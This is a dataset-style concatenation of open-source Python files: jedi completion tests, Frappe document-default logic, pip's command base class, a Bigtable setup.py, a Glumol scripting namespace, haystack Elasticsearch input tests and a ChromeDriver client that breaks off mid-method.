        names = [c.name for c in jedi.Script(s).completions()]
        assert 'a' in names
        assert '__init__' in names
        assert 'mro' not in names  # Exists only for types.

    @unittest.skipIf(numpydoc_unavailable, 'numpydoc module is unavailable')
    def test_numpydoc_docstring(self):
        s = dedent('''
def foobar(x, y):
    """
    Parameters
    ----------
    x : int
    y : str
    """
    y.''')
        names = [c.name for c in jedi.Script(s).completions()]
        assert 'isupper' in names
        assert 'capitalize' in names

    @unittest.skipIf(numpydoc_unavailable, 'numpydoc module is unavailable')
    def test_numpydoc_docstring_set_of_values(self):
        # A numpydoc "{...}" value set implies the union of the member types.
        s = dedent('''
def foobar(x, y):
    """
    Parameters
    ----------
    x : {'foo', 'bar', 100500}, optional
    """
    x.''')
        names = [c.name for c in jedi.Script(s).completions()]
        assert 'isupper' in names
        assert 'capitalize' in names
        assert 'numerator' in names

    @unittest.skipIf(numpydoc_unavailable, 'numpydoc module is unavailable')
    def test_numpydoc_alternative_types(self):
        # "int or str or list" implies completions from all three types.
        s = dedent('''
def foobar(x, y):
    """
    Parameters
    ----------
    x : int or str or list
    """
    x.''')
        names = [c.name for c in jedi.Script(s).completions()]
        assert 'isupper' in names
        assert 'capitalize' in names
        assert 'numerator' in names
        assert 'append' in names
| gpl-3.0 |
gangadhar-kadam/helpdesk-frappe | frappe/model/create_new.py | 15 | 4829 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Create a new document with defaults set
"""
import frappe
from frappe.utils import nowdate, nowtime, now_datetime
import frappe.defaults
from frappe.model.db_schema import type_map
import copy
def get_new_doc(doctype, parent_doc = None, parentfield = None, as_dict=False):
    """Return a new document of *doctype* with default values applied.

    Static/user defaults are computed once per doctype and cached in
    frappe.local.new_doc_templates; dynamic defaults (now/today/":Ref Field")
    are re-evaluated on every call.
    """
    if doctype not in frappe.local.new_doc_templates:
        # cache a copy of new doc as it is called
        # frequently for inserts
        frappe.local.new_doc_templates[doctype] = make_new_doc(doctype)

    # deep-copy so callers can mutate the result without poisoning the cache
    doc = copy.deepcopy(frappe.local.new_doc_templates[doctype])
    # doc = make_new_doc(doctype)

    set_dynamic_default_values(doc, parent_doc, parentfield)

    if as_dict:
        return doc
    else:
        return frappe.get_doc(doc)
def make_new_doc(doctype):
    """Build the cacheable template dict for a new *doctype* document:
    a draft owned by the current user with static/user defaults set."""
    doc = frappe.get_doc({
        "doctype": doctype,
        "__islocal": 1,
        "owner": frappe.session.user,
        "docstatus": 0
    })

    set_user_and_static_default_values(doc)

    doc._fix_numeric_types()
    # reduce to a plain dict; restore the keys get_valid_dict drops
    doc = doc.get_valid_dict()
    doc["doctype"] = doctype
    doc["__islocal"] = 1

    return doc
def set_user_and_static_default_values(doc):
    """Fill *doc*'s fields with user-specific defaults, falling back to the
    static defaults declared on each DocField."""
    user_permissions = frappe.defaults.get_user_permissions()
    defaults = frappe.defaults.get_defaults()

    for df in doc.meta.get("fields"):
        # only fields backed by a database column (see type_map)
        if df.fieldtype in type_map:
            # user defaults win over static docfield defaults
            user_default_value = get_user_default_value(df, defaults, user_permissions)
            if user_default_value is not None:
                doc.set(df.fieldname, user_default_value)
            else:
                # never auto-fill the title field from a static default
                if df.fieldname != doc.meta.title_field:
                    static_default_value = get_static_default_value(df, user_permissions)
                    if static_default_value is not None:
                        doc.set(df.fieldname, static_default_value)
def get_user_default_value(df, defaults, user_permissions):
    """Return the user-specific default for DocField *df*, or None.

    Sources, in priority order: a single allowed value from user permissions
    (Setup doctypes only), then the user's own defaults — provided the value
    is permitted by user permissions.
    """
    # don't set defaults for "User" link field using User Permissions!
    if df.fieldtype == "Link" and df.options != "User":
        # 1 - look in user permissions only for document_type==Setup
        # We don't want to include permissions of transactions to be used for defaults.
        if (frappe.get_meta(df.options).document_type=="Setup"
            and user_permissions_exist(df, user_permissions)
            and len(user_permissions[df.options])==1):
            return user_permissions[df.options][0]

        # 2 - Look in user defaults
        user_default = defaults.get(df.fieldname)

        is_allowed_user_default = user_default and (not user_permissions_exist(df, user_permissions)
            or (user_default in user_permissions.get(df.options, [])))

        # is this user default also allowed as per user permissions?
        if is_allowed_user_default:
            return user_default
def get_static_default_value(df, user_permissions):
    """Return the static default declared on DocField *df*, or None.

    Handles the special tokens "__user" (current session user) and "Today";
    ":Ref"-style defaults are dynamic and handled elsewhere.  For Select
    fields without a default, the first option is used.
    """
    # 3 - look in default of docfield
    if df.get("default"):
        if df.default == "__user":
            return frappe.session.user

        elif df.default == "Today":
            return nowdate()

        elif not df.default.startswith(":"):
            # a simple default value
            is_allowed_default_value = (not user_permissions_exist(df, user_permissions)
                or (df.default in user_permissions.get(df.options, [])))

            if df.fieldtype!="Link" or df.options=="User" or is_allowed_default_value:
                return df.default

    elif (df.fieldtype == "Select" and df.options and df.options not in ("[Select]", "Loading...")):
        # no explicit default: fall back to the first Select option
        return df.options.split("\n")[0]
def set_dynamic_default_values(doc, parent_doc, parentfield):
    """Apply defaults that must be recomputed per call (":Ref Field" lookups,
    "now" timestamps, current time) and link *doc* to its parent."""
    # these values should not be cached
    user_permissions = frappe.defaults.get_user_permissions()

    for df in frappe.get_meta(doc["doctype"]).get("fields"):
        if df.get("default"):
            if df.default.startswith(":"):
                # ":Ref Doctype" — pull the default from another document
                default_value = get_default_based_on_another_field(df, user_permissions, parent_doc)
                if default_value is not None:
                    doc[df.fieldname] = default_value

            elif df.fieldtype == "Datetime" and df.default.lower() == "now":
                doc[df.fieldname] = now_datetime()

            # NOTE(review): nesting of this Time branch under df.get("default")
            # is inferred from context (whitespace was lost) — confirm upstream.
            if df.fieldtype == "Time":
                doc[df.fieldname] = nowtime()

    if parent_doc:
        doc["parent"] = parent_doc.name
        doc["parenttype"] = parent_doc.doctype

    if parentfield:
        doc["parentfield"] = parentfield
def user_permissions_exist(df, user_permissions):
    """Return True when DocField *df* is a Link field that is subject to the
    given user-permission map (i.e. its target doctype has restrictions and
    the field does not opt out via ignore_user_permissions)."""
    if df.fieldtype != "Link":
        return False
    if getattr(df, "ignore_user_permissions", False):
        return False
    # treat a missing/None permission map as "no restrictions"
    return df.options in (user_permissions or [])
def get_default_based_on_another_field(df, user_permissions, parent_doc):
    """Resolve a ":Ref Doctype" default: look up the referenced document
    (named by the parent doc or the session defaults) and copy this field's
    value from it, subject to user permissions."""
    # default value based on another document
    ref_doctype = df.default[1:]
    # ":Ref Doctype" -> fieldname convention, e.g. "User Type" -> user_type
    ref_fieldname = ref_doctype.lower().replace(" ", "_")
    reference_name = parent_doc.get(ref_fieldname) if parent_doc else frappe.db.get_default(ref_fieldname)
    default_value = frappe.db.get_value(ref_doctype, reference_name, df.fieldname)

    is_allowed_default_value = (not user_permissions_exist(df, user_permissions) or
        (default_value in user_permissions.get(df.options, [])))

    # is this allowed as per user permissions
    if is_allowed_default_value:
        return default_value
| mit |
jessefeinman/FintechHackathon | venv/Lib/site-packages/pip/basecommand.py | 79 | 11648 | """Base Command class, and related routines"""
from __future__ import absolute_import
import logging
import os
import sys
import optparse
import warnings
from pip import cmdoptions
from pip.index import PackageFinder
from pip.locations import running_under_virtualenv
from pip.download import PipSession
from pip.exceptions import (BadCommand, InstallationError, UninstallationError,
CommandError, PreviousBuildDirError)
from pip.compat import logging_dictConfig
from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter
from pip.req import InstallRequirement, parse_requirements
from pip.status_codes import (
SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND,
PREVIOUS_BUILD_DIR_ERROR,
)
from pip.utils import deprecation, get_prog, normalize_path
from pip.utils.logging import IndentingFormatter
from pip.utils.outdated import pip_version_check
__all__ = ['Command']
logger = logging.getLogger(__name__)
class Command(object):
    """Base class for all pip commands.

    Subclasses set ``name``/``usage`` (and optionally ``hidden``) and
    implement ``run(options, args)``; :meth:`main` parses command-line
    arguments, configures logging, invokes ``run`` and maps exceptions to
    process exit status codes.
    """

    name = None
    usage = None
    hidden = False
    # (stdout, stderr) destinations for the console logging handlers.
    log_streams = ("ext://sys.stdout", "ext://sys.stderr")

    def __init__(self, isolated=False):
        """Build this command's option parser.

        :param isolated: if True, ignore environment variables and user
            configuration (forwarded to ConfigOptionParser).
        """
        parser_kw = {
            'usage': self.usage,
            'prog': '%s %s' % (get_prog(), self.name),
            'formatter': UpdatingDefaultsHelpFormatter(),
            'add_help_option': False,
            'name': self.name,
            'description': self.__doc__,
            'isolated': isolated,
        }

        self.parser = ConfigOptionParser(**parser_kw)

        # Commands should add options to this option group
        optgroup_name = '%s Options' % self.name.capitalize()
        self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)

        # Add the general options
        gen_opts = cmdoptions.make_option_group(
            cmdoptions.general_group,
            self.parser,
        )
        self.parser.add_option_group(gen_opts)

    def _build_session(self, options, retries=None, timeout=None):
        """Create a PipSession from *options*.

        ``retries`` and ``timeout`` override the corresponding command-line
        options when not None (used by the version self-check in
        :meth:`main`, which wants a short timeout and no retries).
        """
        session = PipSession(
            cache=(
                normalize_path(os.path.join(options.cache_dir, "http"))
                if options.cache_dir else None
            ),
            retries=retries if retries is not None else options.retries,
            insecure_hosts=options.trusted_hosts,
        )

        # Handle custom ca-bundles from the user
        if options.cert:
            session.verify = options.cert

        # Handle SSL client certificate
        if options.client_cert:
            session.cert = options.client_cert

        # Handle timeouts
        if options.timeout or timeout:
            session.timeout = (
                timeout if timeout is not None else options.timeout
            )

        # Handle configured proxies
        if options.proxy:
            session.proxies = {
                "http": options.proxy,
                "https": options.proxy,
            }

        # Determine if we can prompt the user for authentication or not
        session.auth.prompting = not options.no_input

        return session

    def parse_args(self, args):
        # factored out for testability
        return self.parser.parse_args(args)

    def main(self, args):
        """Run the command and return an exit status code."""
        options, args = self.parse_args(args)

        # Map -q/-v to a console log level: -q -> WARNING, -qq -> ERROR,
        # -qqq (or more) -> CRITICAL; -v -> DEBUG; default INFO.
        if options.quiet:
            if options.quiet == 1:
                level = "WARNING"
            # BUG FIX: this branch was a separate `if`, so a single -q set
            # WARNING and then fell into the `else`, silencing everything
            # but CRITICAL.  `elif` gives each quiet count its own level.
            elif options.quiet == 2:
                level = "ERROR"
            else:
                level = "CRITICAL"
        elif options.verbose:
            level = "DEBUG"
        else:
            level = "INFO"

        # The root logger should match the "console" level *unless* we
        # specified "--log" to send debug logs to a file.
        root_level = level
        if options.log:
            root_level = "DEBUG"

        logging_dictConfig({
            "version": 1,
            "disable_existing_loggers": False,
            "filters": {
                "exclude_warnings": {
                    "()": "pip.utils.logging.MaxLevelFilter",
                    "level": logging.WARNING,
                },
            },
            "formatters": {
                "indent": {
                    "()": IndentingFormatter,
                    "format": "%(message)s",
                },
            },
            "handlers": {
                # stdout carries records below WARNING only; WARNING and
                # above go to stderr through "console_errors".
                "console": {
                    "level": level,
                    "class": "pip.utils.logging.ColorizedStreamHandler",
                    "stream": self.log_streams[0],
                    "filters": ["exclude_warnings"],
                    "formatter": "indent",
                },
                "console_errors": {
                    "level": "WARNING",
                    "class": "pip.utils.logging.ColorizedStreamHandler",
                    "stream": self.log_streams[1],
                    "formatter": "indent",
                },
                "user_log": {
                    "level": "DEBUG",
                    "class": "pip.utils.logging.BetterRotatingFileHandler",
                    "filename": options.log or "/dev/null",
                    "delay": True,
                    "formatter": "indent",
                },
            },
            "root": {
                "level": root_level,
                "handlers": list(filter(None, [
                    "console",
                    "console_errors",
                    "user_log" if options.log else None,
                ])),
            },
            # Disable any logging besides WARNING unless we have DEBUG level
            # logging enabled. These use both pip._vendor and the bare names
            # for the case where someone unbundles our libraries.
            "loggers": dict(
                (
                    name,
                    {
                        "level": (
                            "WARNING"
                            if level in ["INFO", "ERROR"]
                            else "DEBUG"
                        ),
                    },
                )
                for name in ["pip._vendor", "distlib", "requests", "urllib3"]
            ),
        })

        if sys.version_info[:2] == (2, 6):
            warnings.warn(
                "Python 2.6 is no longer supported by the Python core team, "
                "please upgrade your Python. A future version of pip will "
                "drop support for Python 2.6",
                deprecation.Python26DeprecationWarning
            )

        # TODO: try to get these passing down from the command?
        # without resorting to os.environ to hold these.
        if options.no_input:
            os.environ['PIP_NO_INPUT'] = '1'

        if options.exists_action:
            os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action)

        if options.require_venv:
            # If a venv is required check if it can really be found
            if not running_under_virtualenv():
                logger.critical(
                    'Could not find an activated virtualenv (required).'
                )
                sys.exit(VIRTUALENV_NOT_FOUND)

        try:
            status = self.run(options, args)
            # FIXME: all commands should return an exit status
            # and when it is done, isinstance is not needed anymore
            if isinstance(status, int):
                return status
        except PreviousBuildDirError as exc:
            logger.critical(str(exc))
            logger.debug('Exception information:', exc_info=True)

            return PREVIOUS_BUILD_DIR_ERROR
        except (InstallationError, UninstallationError, BadCommand) as exc:
            logger.critical(str(exc))
            logger.debug('Exception information:', exc_info=True)

            return ERROR
        except CommandError as exc:
            logger.critical('ERROR: %s', exc)
            logger.debug('Exception information:', exc_info=True)

            return ERROR
        except KeyboardInterrupt:
            logger.critical('Operation cancelled by user')
            logger.debug('Exception information:', exc_info=True)

            return ERROR
        except:
            # Intentionally broad last-resort handler: turn any unexpected
            # exception into UNKNOWN_ERROR instead of an unhandled traceback.
            logger.critical('Exception:', exc_info=True)

            return UNKNOWN_ERROR
        finally:
            # Check if we're using the latest version of pip available
            if (not options.disable_pip_version_check and not
                    getattr(options, "no_index", False)):
                with self._build_session(
                        options,
                        retries=0,
                        timeout=min(5, options.timeout)) as session:
                    pip_version_check(session)

        return SUCCESS
class RequirementCommand(Command):
    """Intermediate base for commands that take requirements on the command
    line or from files (install, download, wheel, ...)."""

    @staticmethod
    def populate_requirement_set(requirement_set, args, options, finder,
                                 session, name, wheel_cache):
        """
        Marshal cmd line args into a requirement set.

        Requirements are added in a fixed order: constraint files first,
        then positional args, then editables, then -r requirement files.
        Warns (does not fail) when no requirement was given at all.
        """
        # Constraint files (-c) restrict versions of later requirements.
        for filename in options.constraints:
            for req in parse_requirements(
                    filename,
                    constraint=True, finder=finder, options=options,
                    session=session, wheel_cache=wheel_cache):
                requirement_set.add_requirement(req)

        # Requirement specifiers given directly on the command line.
        for req in args:
            requirement_set.add_requirement(
                InstallRequirement.from_line(
                    req, None, isolated=options.isolated_mode,
                    wheel_cache=wheel_cache
                )
            )

        # -e/--editable requirements.
        for req in options.editables:
            requirement_set.add_requirement(
                InstallRequirement.from_editable(
                    req,
                    default_vcs=options.default_vcs,
                    isolated=options.isolated_mode,
                    wheel_cache=wheel_cache
                )
            )

        # -r/--requirement files; remember whether any produced a req so the
        # "nothing to do" warning below stays accurate.
        found_req_in_file = False
        for filename in options.requirements:
            for req in parse_requirements(
                    filename,
                    finder=finder, options=options, session=session,
                    wheel_cache=wheel_cache):
                found_req_in_file = True
                requirement_set.add_requirement(req)
        # If --require-hashes was a line in a requirements file, tell
        # RequirementSet about it:
        requirement_set.require_hashes = options.require_hashes

        # No requirements at all: emit a helpful hint rather than an error.
        if not (args or options.editables or found_req_in_file):
            opts = {'name': name}
            if options.find_links:
                msg = ('You must give at least one requirement to '
                       '%(name)s (maybe you meant "pip %(name)s '
                       '%(links)s"?)' %
                       dict(opts, links=' '.join(options.find_links)))
            else:
                msg = ('You must give at least one requirement '
                       'to %(name)s (see "pip help %(name)s")' % opts)
            logger.warning(msg)

    def _build_package_finder(self, options, session):
        """
        Create a package finder appropriate to this requirement command.

        --no-index empties the index URL list (find-links still applies).
        """
        index_urls = [options.index_url] + options.extra_index_urls
        if options.no_index:
            logger.info('Ignoring indexes: %s', ','.join(index_urls))
            index_urls = []

        return PackageFinder(
            find_links=options.find_links,
            format_control=options.format_control,
            index_urls=index_urls,
            trusted_hosts=options.trusted_hosts,
            allow_all_prereleases=options.pre,
            process_dependency_links=options.process_dependency_links,
            session=session,
        )
| bsd-2-clause |
jgeewax/gcloud-python | bigtable/setup.py | 3 | 2126 | # Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from setuptools import find_packages
from setuptools import setup
# Directory of this setup.py; used to locate README.rst for the long
# description below.
PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__))

with open(os.path.join(PACKAGE_ROOT, 'README.rst')) as file_obj:
    README = file_obj.read()

# Metadata shared by every google-cloud-* sub-package's setup.py.
# NOTE: This is duplicated throughout and we should try to
# consolidate.
SETUP_BASE = {
    'author': 'Google Cloud Platform',
    'author_email': 'jjg+google-cloud-python@google.com',
    'scripts': [],
    'url': 'https://github.com/GoogleCloudPlatform/google-cloud-python',
    'license': 'Apache 2.0',
    'platforms': 'Posix; MacOS X; Windows',
    'include_package_data': True,
    'zip_safe': False,
    'classifiers': [
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Topic :: Internet',
    ],
}

# Runtime dependencies; upper bounds pin the next breaking minor release.
REQUIREMENTS = [
    'google-cloud-core >= 0.22.1, < 0.23dev',
    'grpcio >= 1.0.2, < 2.0dev',
]

setup(
    name='google-cloud-bigtable',
    version='0.22.0',
    description='Python Client for Google Cloud Bigtable',
    long_description=README,
    # Declare the shared 'google' / 'google.cloud' namespace packages so
    # sibling google-cloud-* distributions can coexist in one environment.
    namespace_packages=[
        'google',
        'google.cloud',
    ],
    packages=find_packages(),
    install_requires=REQUIREMENTS,
    **SETUP_BASE
)
| apache-2.0 |
lebauce/artub | glumolnamespace.py | 1 | 3055 | # Glumol - An adventure game creator
# Copyright (C) 1998-2008 Sylvain Baubeau & Alexis Contour
# This file is part of Glumol.
# Glumol is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# Glumol is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Glumol. If not, see <http://www.gnu.org/licenses/>.
import sys
from pypoujol import *
from new import instancemethod
from log import log
from behaviour import *
from script import get_full_name
class GlumolNamespace:
    """Execution namespace for Glumol game scripts.

    Wraps a globals/locals dictionary pair and provides helpers to eval/exec
    script listings and instantiate the classes they define.  Python 2 only:
    uses the ``exec ... in globals, locals`` statement form.
    """

    def __init__(self):
        # Seed the script globals with a snapshot of this module's globals
        # (pypoujol, behaviour, ... are star-imported at module level).
        self.globals = dict(globals())
        self.locals = { }

    def clear(self):
        # NOTE(review): resetting the namespace is commented out, so clear()
        # is currently a deliberate no-op -- confirm this is intended.
        # self.globals = dict(globals())
        # self.locals = { }
        pass

    def get_value(self, name):
        # Raises KeyError if *name* is not a global of this namespace.
        return self.globals[name]

    def call(self, func, args):
        """Invoke func(*args) inside the namespace's locals, then remove the
        temporary 'func'/'args' bindings again."""
        self.locals["func"] = func
        self.locals["args"] = args
        exec "func(*args)" in self.locals, self.locals
        del self.locals["func"]
        del self.locals["args"]

    def eval(self, listing):
        """Evaluate the expression *listing* inside the namespace."""
        return eval(listing, self.globals, self.locals)

    def run(self, listing, module = __name__, globs = None, locs = None):
        """Exec *listing* in the namespace, temporarily posing as *module*.

        __name__ is swapped in so code that branches on it behaves as if it
        lived in *module*, then restored to this wrapper module's name.
        """
        if not globs:
            globs = self.globals
        if not locs:
            locs = self.globals
        globs["__name__"] = module
        exec listing in globs, locs
        globs["__name__"] = "glumolnamespace"

    def getattr(self, name, *defaults):
        """Resolve a dotted *name* ("a.b.c") against globals, then locals,
        then *defaults* (first extra argument) if the root is unbound.

        NOTE(review): intentionally shadows the builtin getattr() as a
        method name; inside this body the builtin is still reachable.
        """
        attrs = name.split('.')
        try: o = self.globals[attrs[0]]
        except:
            if len(defaults):
                try: o = self.locals[attrs[0]]
                except: o = defaults[0]
            else: o = self.locals[attrs[0]]
        # Walk the remaining dotted components; missing attributes yield None.
        for i in attrs[1:]:
            o = getattr(o, i, None)
        return o

    def create_object(self, classe, loc = None, args = tuple() ):
        """Instantiate *classe* with *args* by eval-ing the call inside the
        namespace, so construction sees script globals; returns the instance."""
        if loc == None:
            loc = self.locals
        loc["classe"] = classe
        loc["args"] = args
        s = "classe(*args)"
        self.obj = newobj = eval(s, self.globals, self.locals)
        del loc["args"]
        del loc["classe"]
        return newobj

    def create_from_script(self, script, args = tuple() ):
        """Exec a script's listing, then locate and instantiate its class.

        Lookup order: script.realname, script.name, then the fully-qualified
        form of script.name.  NOTE(review): the bare `raise` with no active
        exception is used to force a jump into the fallback `except` blocks.
        """
        self.run(script.listing)
        try:
            classe = self.getattr(script.realname)
            if not classe: raise
        except:
            try:
                classe = self.getattr(script.name)
                if not classe: raise
            except:
                classe = self.getattr(get_full_name(script.name))
        return self.create_object(classe, None, args)
| gpl-2.0 |
josesanch/django-haystack | tests/elasticsearch_tests/tests/inputs.py | 10 | 3525 | from django.test import TestCase
from haystack import connections
from haystack import inputs
class ElasticsearchInputTestCase(TestCase):
    """Exercise haystack's input wrappers (Raw, Clean, Exact, Not, AutoQuery,
    AltParser) against the Elasticsearch backend's query preparation."""

    def setUp(self):
        """Grab a query object for the default connection to prepare against."""
        super(ElasticsearchInputTestCase, self).setUp()
        self.query_obj = connections['default'].get_query()

    def test_raw_init(self):
        """Raw stores the query string untouched and never post-processes."""
        query = inputs.Raw('hello OR there, :you')
        self.assertEqual(query.query_string, 'hello OR there, :you')
        self.assertEqual(query.kwargs, {})
        self.assertEqual(query.post_process, False)

        query = inputs.Raw('hello OR there, :you', test='really')
        self.assertEqual(query.query_string, 'hello OR there, :you')
        self.assertEqual(query.kwargs, {'test': 'really'})
        self.assertEqual(query.post_process, False)

    def test_raw_prepare(self):
        """Raw passes through verbatim on prepare."""
        query = inputs.Raw('hello OR there, :you')
        self.assertEqual(query.prepare(self.query_obj), 'hello OR there, :you')

    def test_clean_init(self):
        query = inputs.Clean('hello OR there, :you')
        self.assertEqual(query.query_string, 'hello OR there, :you')
        self.assertEqual(query.post_process, True)

    def test_clean_prepare(self):
        """Clean lowercases operators and escapes reserved characters."""
        query = inputs.Clean('hello OR there, :you')
        self.assertEqual(query.prepare(self.query_obj), 'hello or there, \\:you')

    def test_exact_init(self):
        query = inputs.Exact('hello OR there, :you')
        self.assertEqual(query.query_string, 'hello OR there, :you')
        self.assertEqual(query.post_process, True)

    def test_exact_prepare(self):
        """Exact wraps in quotes; with clean=True it also escapes first."""
        query = inputs.Exact('hello OR there, :you')
        self.assertEqual(query.prepare(self.query_obj), u'"hello OR there, :you"')

        query = inputs.Exact('hello OR there, :you', clean=True)
        self.assertEqual(query.prepare(self.query_obj), u'"hello or there, \\:you"')

    def test_not_init(self):
        query = inputs.Not('hello OR there, :you')
        self.assertEqual(query.query_string, 'hello OR there, :you')
        self.assertEqual(query.post_process, True)

    def test_not_prepare(self):
        """Not cleans the input and wraps it in NOT (...)."""
        query = inputs.Not('hello OR there, :you')
        self.assertEqual(query.prepare(self.query_obj), u'NOT (hello or there, \\:you)')

    def test_autoquery_init(self):
        query = inputs.AutoQuery('panic -don\'t "froody dude"')
        self.assertEqual(query.query_string, 'panic -don\'t "froody dude"')
        self.assertEqual(query.post_process, False)

    def test_autoquery_prepare(self):
        """AutoQuery turns leading '-' into NOT and keeps quoted phrases."""
        query = inputs.AutoQuery('panic -don\'t "froody dude"')
        self.assertEqual(query.prepare(self.query_obj), u'panic NOT don\'t "froody dude"')

    def test_altparser_init(self):
        """AltParser records parser name, query string and extra kwargs."""
        parser_input = inputs.AltParser('dismax')
        self.assertEqual(parser_input.parser_name, 'dismax')
        self.assertEqual(parser_input.query_string, '')
        self.assertEqual(parser_input.kwargs, {})
        self.assertEqual(parser_input.post_process, False)

        parser_input = inputs.AltParser('dismax', 'douglas adams', qf='author', mm=1)
        self.assertEqual(parser_input.parser_name, 'dismax')
        self.assertEqual(parser_input.query_string, 'douglas adams')
        self.assertEqual(parser_input.kwargs, {'mm': 1, 'qf': 'author'})
        self.assertEqual(parser_input.post_process, False)

    def test_altparser_prepare(self):
        """AltParser renders Solr-style local-params syntax."""
        parser_input = inputs.AltParser('dismax', 'douglas adams', qf='author', mm=1)
        self.assertEqual(parser_input.prepare(self.query_obj),
                         u"""{!dismax mm=1 qf=author v='douglas adams'}""")
| bsd-3-clause |
ds-hwang/chromium-crosswalk | chrome/test/chromedriver/client/chromedriver.py | 7 | 12885 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import command_executor
from command_executor import Command
from webelement import WebElement
class ChromeDriverException(Exception):
pass
class NoSuchElement(ChromeDriverException):
pass
class NoSuchFrame(ChromeDriverException):
pass
class UnknownCommand(ChromeDriverException):
pass
class StaleElementReference(ChromeDriverException):
pass
class UnknownError(ChromeDriverException):
pass
class JavaScriptError(ChromeDriverException):
pass
class XPathLookupError(ChromeDriverException):
pass
class NoSuchWindow(ChromeDriverException):
pass
class InvalidCookieDomain(ChromeDriverException):
pass
class ScriptTimeout(ChromeDriverException):
pass
class InvalidSelector(ChromeDriverException):
pass
class SessionNotCreatedException(ChromeDriverException):
pass
class NoSuchSession(ChromeDriverException):
pass
class UnexpectedAlertOpen(ChromeDriverException):
pass
def _ExceptionForResponse(response):
exception_class_map = {
6: NoSuchSession,
7: NoSuchElement,
8: NoSuchFrame,
9: UnknownCommand,
10: StaleElementReference,
13: UnknownError,
17: JavaScriptError,
19: XPathLookupError,
23: NoSuchWindow,
24: InvalidCookieDomain,
26: UnexpectedAlertOpen,
28: ScriptTimeout,
32: InvalidSelector,
33: SessionNotCreatedException
}
status = response['status']
msg = response['value']['message']
return exception_class_map.get(status, ChromeDriverException)(msg)
class ChromeDriver(object):
  """Starts and controls a single Chrome instance on this machine."""

  def __init__(self, server_url, chrome_binary=None, android_package=None,
               android_activity=None, android_process=None,
               android_use_running_app=None, chrome_switches=None,
               chrome_extensions=None, chrome_log_path=None,
               debugger_address=None, logging_prefs=None,
               mobile_emulation=None, experimental_options=None,
               download_dir=None):
    """Create a new session against the chromedriver server at server_url.

    The keyword arguments are assembled into the chromeOptions capability;
    Android options take precedence over a desktop chrome_binary.
    """
    self._executor = command_executor.CommandExecutor(server_url)

    options = {}
    if experimental_options:
      assert isinstance(experimental_options, dict)
      options = experimental_options.copy()

    if android_package:
      options['androidPackage'] = android_package
      if android_activity:
        options['androidActivity'] = android_activity
      if android_process:
        options['androidProcess'] = android_process
      if android_use_running_app:
        options['androidUseRunningApp'] = android_use_running_app
    elif chrome_binary:
      options['binary'] = chrome_binary

    if chrome_switches:
      assert type(chrome_switches) is list
      options['args'] = chrome_switches

    if mobile_emulation:
      assert type(mobile_emulation) is dict
      options['mobileEmulation'] = mobile_emulation

    if chrome_extensions:
      assert type(chrome_extensions) is list
      options['extensions'] = chrome_extensions

    if chrome_log_path:
      assert type(chrome_log_path) is str
      options['logPath'] = chrome_log_path

    if debugger_address:
      assert type(debugger_address) is str
      options['debuggerAddress'] = debugger_address

    if logging_prefs:
      # Validate requested log types/levels before sending them over.
      assert type(logging_prefs) is dict
      log_types = ['client', 'driver', 'browser', 'server', 'performance']
      log_levels = ['ALL', 'DEBUG', 'INFO', 'WARNING', 'SEVERE', 'OFF']
      for log_type, log_level in logging_prefs.iteritems():
        assert log_type in log_types
        assert log_level in log_levels
    else:
      logging_prefs = {}

    # (An unused `download_prefs = {}` local was removed here.)
    if download_dir:
      if 'prefs' not in options:
        options['prefs'] = {}
      if 'download' not in options['prefs']:
        options['prefs']['download'] = {}
      options['prefs']['download']['default_directory'] = download_dir

    params = {
        'desiredCapabilities': {
            'chromeOptions': options,
            'loggingPrefs': logging_prefs
        }
    }

    response = self._ExecuteCommand(Command.NEW_SESSION, params)
    self._session_id = response['sessionId']
    self.capabilities = self._UnwrapValue(response['value'])

  def _WrapValue(self, value):
    """Wrap value from client side for chromedriver side."""
    if isinstance(value, dict):
      converted = {}
      for key, val in value.items():
        converted[key] = self._WrapValue(val)
      return converted
    elif isinstance(value, WebElement):
      # Elements cross the wire as {'ELEMENT': <opaque id>}.
      return {'ELEMENT': value._id}
    elif isinstance(value, list):
      return list(self._WrapValue(item) for item in value)
    else:
      return value

  def _UnwrapValue(self, value):
    """Unwrap value from chromedriver side for client side."""
    if isinstance(value, dict):
      # A single-key {'ELEMENT': <str>} dict denotes a wire-format element.
      if (len(value) == 1 and 'ELEMENT' in value
          and isinstance(value['ELEMENT'], basestring)):
        return WebElement(self, value['ELEMENT'])
      else:
        unwraped = {}
        for key, val in value.items():
          unwraped[key] = self._UnwrapValue(val)
        return unwraped
    elif isinstance(value, list):
      return list(self._UnwrapValue(item) for item in value)
    else:
      return value

  def _ExecuteCommand(self, command, params=None):
    """Send a raw command; raise the mapped exception on non-zero status.

    Bug fix: `params` previously defaulted to a shared mutable dict.
    """
    if params is None:
      params = {}
    params = self._WrapValue(params)
    response = self._executor.Execute(command, params)
    if response['status'] != 0:
      raise _ExceptionForResponse(response)
    return response

  def ExecuteCommand(self, command, params=None):
    """Send a session-scoped command and return its unwrapped value.

    Bug fix: `params` previously defaulted to a shared mutable dict which
    this method then mutated ('sessionId'), polluting later default calls.
    """
    if params is None:
      params = {}
